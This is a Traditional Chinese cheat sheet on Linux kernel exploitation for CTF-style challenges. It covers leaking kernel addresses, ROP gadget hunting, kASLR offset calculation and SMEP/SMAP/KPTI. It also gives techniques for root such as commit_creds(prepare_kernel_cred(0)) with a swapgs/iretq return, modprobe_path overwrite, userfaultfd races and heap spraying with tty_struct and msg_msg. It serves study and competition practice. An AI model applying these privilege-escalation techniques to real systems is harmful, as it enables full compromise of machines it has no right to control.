---
title: Linux Kernel pwn
tags: security
lang: zh_tw
---
# Linux Kernel pwn
## Inspection
### 取得 symbol address
方便下斷點觀察
```
# 觀察 printk 輸出
echo /proc/sys/kernel/dmesg_restrict # 觀察是否有權限讀 printk 輸出
dmesg
# 拿 kernel module address
cat /proc/modules
lsmod
# 拿 all symbol address
echo /proc/sys/kernel/kptr_restrict # 觀察是否有權限讀 kallsyms
cat /proc/kallsyms
```
### 從 bzImage 萃取 vmlinux
取得 vmlinux 後, 就能再用 ROPgadget 取得各種 gadget
使用 Linux 內建的腳本 [extract-vmlinux]( https://github.com/torvalds/linux/blob/master/scripts/extract-vmlinux) 就能完成
```
./extract-vmlinux bzImage > vmlinux
```
### 取得 gadget
* 對 vmlinux 用 [ROPgadget](https://github.com/JonathanSalwan/ROPgadget) 即可, 注意要設定 range 以取出有執行權限的 gadget
* 用 ropper 跑比較久, 但比較準
* `ropper --nocolor --file ./vmlinux > ropper_gadget`
### 取得 kASLR offset
若有啟用 kASLR, 則還需要換算 gadget address
```
# 取得實際的 text offset
# cat /proc/kallsyms | grep "T _text"
ffffffff88600000 T _text
# 取得 vmlinux 中的 text offset
# readelf -a vmlinux | grep " .text"
[ 1] .text PROGBITS ffffffff81000000 00200000
00 .text .notes __ex_table .rodata .pci_fixup __ksymtab __ksymtab_gpl __ksymtab_strings __param __modver
# 兩者相減就是 offset 了
# 假設 gadget 在 vmlinux 中的 0xffffffff811bc873
# 其實際的 address 為
# gadget - vmlinux.text.base + real.text.offset
# 0xffffffff811bc873 - 0xffffffff81000000 + ffffffff88600000
# = 0xffffffff887bc873
```
### 取得 memory info
查看 slab/slub 記憶體分配資訊
```
sudo cat /proc/meminfo
slabtop
sudo cat /proc/slabinfo
```
## 防禦機制
### SMEP
* Kernel 不能執行 user code
* 紀錄在 cr4
### SMAP
* Kernel 不能讀寫 user memory
* 紀錄在 cr4
### KPTI
* 效果類似 SMEP + SMAP
* 拿來擋 meltdown 的 side channel attack
* 回 user mode 時要修 cr3
* 可以呼叫 `swapgs_restore_regs_and_return_to_usermode` 這個 function, 直接幫你修好 cr3
## 常用 structure
* `tty_struct` (0x2e0, 0x2c0) base, heap
* [定義](https://elixir.bootlin.com/linux/latest/source/include/linux/tty.h#L285)
* Allocate
* `int pfd = open("/dev/ptmx", O_RDWR|O_NOCTTY);`
* Release
* `close(pfd)`
* Write
* `write(pfd, garbage, sizeof(garbage)`
* Control flow
* 控制 `tty_operations` vtable, 有機會控執行流
* 相關 offset
* offset 0: 需要為 MAGIC
```c
/* tty magic number */
#define TTY_MAGIC 0x5401
```
* offset 0x18: 為 tty_operations 結構, 以下是此結構 offset
* offset 0x56: 為 write 的 function pointer
* `shm_file_data` (0x20) base, heap
* `seq_operations` (0x20) base
* `msg_msg` (0x30 ~ 0x1000) heap
* `msgget()`
* `msgsnd(qid, &msgbuf, real_size - 0x30, 0)`
* 呼叫 `kmalloc(size+0x30)`
* 將 msgbuf 內容 copy ⾄ chunk + 0x30 處,前 0x30 為其 header
* `msgrcv(qid, &msgbuf, real_size - 0x30, 1, 0)`
* `kfree()`
* https://duasynt.com/blog/linux-kernel-heap-spray
*
* `subprocess_info` (0x60) base, heap
* 參考
* [Kernel Exploitで使える構造体集](https://ptr-yudai.hatenablog.com/entry/2020/03/16/165628)
## Common Vulns
### Double fetch
* kernel space 和 user space 的 race condition
* kernel 存取兩次同樣的 user space data, 之間產生 race condition 的空隙 (第一次存取給你 A, 第二次存取給你 B)
## 各種 Exploit
### 提權
* 執行到 commit_creds(prepare_kernel_cred(0)) 完成提權
* pop rdi
* mov rdi, rax
* 回到 user mode
* swapgs
* iretq
* 並執行 /bin/sh
* iretq 排好 gadget, 依序是
* rip
* user_cs
* user_eflags
* user_sp
* user_ss
* 可用以下函數儲存使用者暫存器
```c
unsigned long user_cs, user_ss, user_eflags, user_sp;
void save_stats()
{
asm(
"movq %%cs, %0\n"
"movq %%ss, %1\n"
"movq %%rsp, %3\n"
"pushfq\n"
"popq %2\n"
: "=r"(user_cs), "=r"(user_ss), "=r"(user_eflags), "=r"(user_sp)
:
: "memory"
);
}
```
### modprobe_path
* 其為 kernel global variable
* `/proc/sys/kernel/modprobe`
* 執行一個 kernel 認不得的執行檔格式時, kernel 會去執行 `modprobe_path` 字串所寫的程式
* trace code 流程
* sys_execve
* do_execve
* do_execveat_common
* bprm_execve
* exec_binprm
* **search_binary_handler**
* request_module
* call_modprobe
* call_usermodehelper_exec
* 利用方式
* 改掉 modprobe_path, 改成自己的惡意程式
* 執行一個不是執行檔的東西, 讓 kernel 認不得
* kernel 就會去執行你的惡意程式 :)
* 利用方式 2
* 但是改掉後繼續跑會 panic
* 沒關係, 改掉後讓程式進無窮迴圈就好, 讓程式在背景執行
* 不會炸裂 + 還是有改到 `modprobe_path`
* 補充冷知識
* Shebang
### setxattr & userfaultfd
* `userfaultfd`
* 為某段記憶體註冊 page fault handler
* `copy_from_user` `copy_to_user` 也會踩到 page fault
* 製造 race condition
* `setxattr`
```c
static long
setxattr(struct dentry *d, const char __user *name, const void __user *value,
size_t size, int flags)
{
int error;
void *kvalue = NULL;
char kname[XATTR_NAME_MAX + 1];
if (flags & ~(XATTR_CREATE|XATTR_REPLACE))
return -EINVAL;
error = strncpy_from_user(kname, name, sizeof(kname));
if (error == 0 || error == sizeof(kname))
error = -ERANGE;
if (error < 0)
return error;
if (size) {
if (size > XATTR_SIZE_MAX)
return -E2BIG;
kvalue = kvmalloc(size, GFP_KERNEL);
if (!kvalue)
return -ENOMEM;
if (copy_from_user(kvalue, value, size)) {
error = -EFAULT;
goto out;
}
if ((strcmp(kname, XATTR_NAME_POSIX_ACL_ACCESS) == 0) ||
(strcmp(kname, XATTR_NAME_POSIX_ACL_DEFAULT) == 0))
posix_acl_fix_xattr_from_user(kvalue, size);
else if (strcmp(kname, XATTR_NAME_CAPS) == 0) {
error = cap_convert_nscap(d, &kvalue, size);
if (error < 0)
goto out;
size = error;
}
}
error = vfs_setxattr(d, kname, kvalue, size, flags);
out:
kvfree(kvalue);
return error;
}
```
* 注意裡面調用 `kvmalloc` `copy_from_user` `kfree` 的部分
* 任意時機調用 `kvmalloc` (size 1 ~ 0x10000)
* 會從 user land 複製 data 到 chunk (`copy_from_user`)
* 搭配 `userfaultfd` 可以任意控制 `kfree` 時機
### mmap
* 可以用 `mmap` 申請記憶體
* 配合類似 `mov esp, eax` 的 gadget, 讓 stack migrate 到 `mmap` 申請到的空間, 在只能控一次執行流時, 能以此將問題變成 ROP
* 使用範例
```c
// Allocate rop_chain address space
ULL *rop_chain = mmap((void *)addr,
0x1000,
PROT_READ | PROT_WRITE | PROT_EXEC,
MAP_PRIVATE | MAP_ANONYMOUS,
0,
0);
```
### signal
* 回到 user mode 卻發生異常?
* `signal(SIGSEGV, get_shell);`
## Other notes
### current gs:off_14D00
Kernel 中用 `current` 代表著現在的 task
查看以下 code
```c
/*
* This routine handles page faults. It determines the address,
* and the problem, and then passes it off to one of the appropriate
* routines.
*/
static noinline void
__do_page_fault(struct pt_regs *regs, unsigned long error_code,
unsigned long address)
{
struct vm_area_struct *vma;
struct task_struct *tsk;
struct mm_struct *mm;
vm_fault_t fault, major = 0;
unsigned int flags = FAULT_FLAG_ALLOW_RETRY | FAULT_FLAG_KILLABLE;
u32 pkey;
tsk = current;
mm = tsk->mm;
prefetchw(&mm->mmap_sem);
```
([v4.19.98| __do_page_fault#1206](https://elixir.bootlin.com/linux/v4.19.98/source/arch/x86/mm/fault.c#L1206))
其對應的 x64 組語如下
```asm
.text:FFFFFFFF81043110 push rbp
.text:FFFFFFFF81043111 mov rax, gs:off_14D00
.text:FFFFFFFF8104311A mov rbp, rsp
.text:FFFFFFFF8104311D push r15
.text:FFFFFFFF8104311F push r14
.text:FFFFFFFF81043121 push r13
.text:FFFFFFFF81043123 mov r13, rsi
.text:FFFFFFFF81043126 push r12
.text:FFFFFFFF81043128 mov r12, rdi
.text:FFFFFFFF8104312B push rbx
.text:FFFFFFFF8104312C mov rbx, rdx
.text:FFFFFFFF8104312F sub rsp, 38h
.text:FFFFFFFF81043133 mov r14, [rax+2A8h]
.text:FFFFFFFF8104313A mov [rbp+var_40], rax
.text:FFFFFFFF8104313E lea rax, [r14+60h]
.text:FFFFFFFF81043142 mov [rbp+var_38], rax
.text:FFFFFFFF81043146 prefetcht0 byte ptr [r14+60h]
```
**可以看得出來 `gs:off_14D00` 就存著 `current`**
### gdb debug
```
add-symbol-file path/to/.kofile
```
* 若 module 有帶 symbol, 可以這樣 load symbol
```
add-symbol-file driver.ko <driver_base_addr> [-s <section1_name> <section1_addr>] ...
```
### Source code tracing
copy_from_user -> ... -> copy_user_generic
### cpio
```
mkdir rootfs
cd rootfs
gunzip ../rootfs.cpio.gz
sudo cpio -idm < /path/to/rootfs.cpio
sudo chown root:root -R rootfs
sudo find . -print | sudo cpio -o -Hnewc > ../my.cpio
sudo find . -print | sudo cpio -o -Hnewc | gzip -9 > ../my.cpio.gz
```
* [decompress_cpio.sh](https://gist.github.com/brant-ruan/784808bc192fff533d8be22932c4e2b6)
```bash
#!/bin/bash
# Decompress a .cpio.gz packed file system
rm -rf ./initramfs && mkdir initramfs
pushd . && pushd initramfs
cp ../initramfs.cpio.gz .
gzip -dc initramfs.cpio.gz | cpio -idm &>/dev/null && rm initramfs.cpio.gz
popd
```
* [compile_exp_and_compress_cpio.sh](https://gist.github.com/brant-ruan/b67dc2fbae150e7bc76fda914816f534)
```bash
#!/bin/bash
# Compress initramfs with the included statically linked exploit
in=$1
out=$(echo $in | awk '{ print substr( $0, 1, length($0)-2 ) }')
gcc $in -static -o $out || exit 255
mv $out initramfs
pushd . && pushd initramfs
find . -print0 | cpio --null --format=newc -o 2>/dev/null | gzip -9 > ../initramfs.cpio.gz
popd
```
`./compile_exp_and_compress_cpio.sh exploit.c`
### Kernel Memory Layout
* https://elixir.bootlin.com/linux/v4.9.249/source/Documentation/x86/x86_64/mm.txt
```
Virtual memory map with 4 level page tables:
0000000000000000 - 00007fffffffffff (=47 bits) user space, different per mm
hole caused by [48:63] sign extension
ffff800000000000 - ffff87ffffffffff (=43 bits) guard hole, reserved for hypervisor
ffff880000000000 - ffffc7ffffffffff (=64 TB) direct mapping of all phys. memory
ffffc80000000000 - ffffc8ffffffffff (=40 bits) hole
ffffc90000000000 - ffffe8ffffffffff (=45 bits) vmalloc/ioremap space
ffffe90000000000 - ffffe9ffffffffff (=40 bits) hole
ffffea0000000000 - ffffeaffffffffff (=40 bits) virtual memory map (1TB)
... unused hole ...
ffffec0000000000 - fffffbffffffffff (=44 bits) kasan shadow memory (16TB)
... unused hole ...
ffffff0000000000 - ffffff7fffffffff (=39 bits) %esp fixup stacks
... unused hole ...
ffffffef00000000 - fffffffeffffffff (=64 GB) EFI region mapping space
... unused hole ...
ffffffff80000000 - ffffffff9fffffff (=512 MB) kernel text mapping, from phys 0
ffffffffa0000000 - ffffffffff5fffff (=1526 MB) module mapping space
ffffffffff600000 - ffffffffffdfffff (=8 MB) vsyscalls
ffffffffffe00000 - ffffffffffffffff (=2 MB) unused hole
```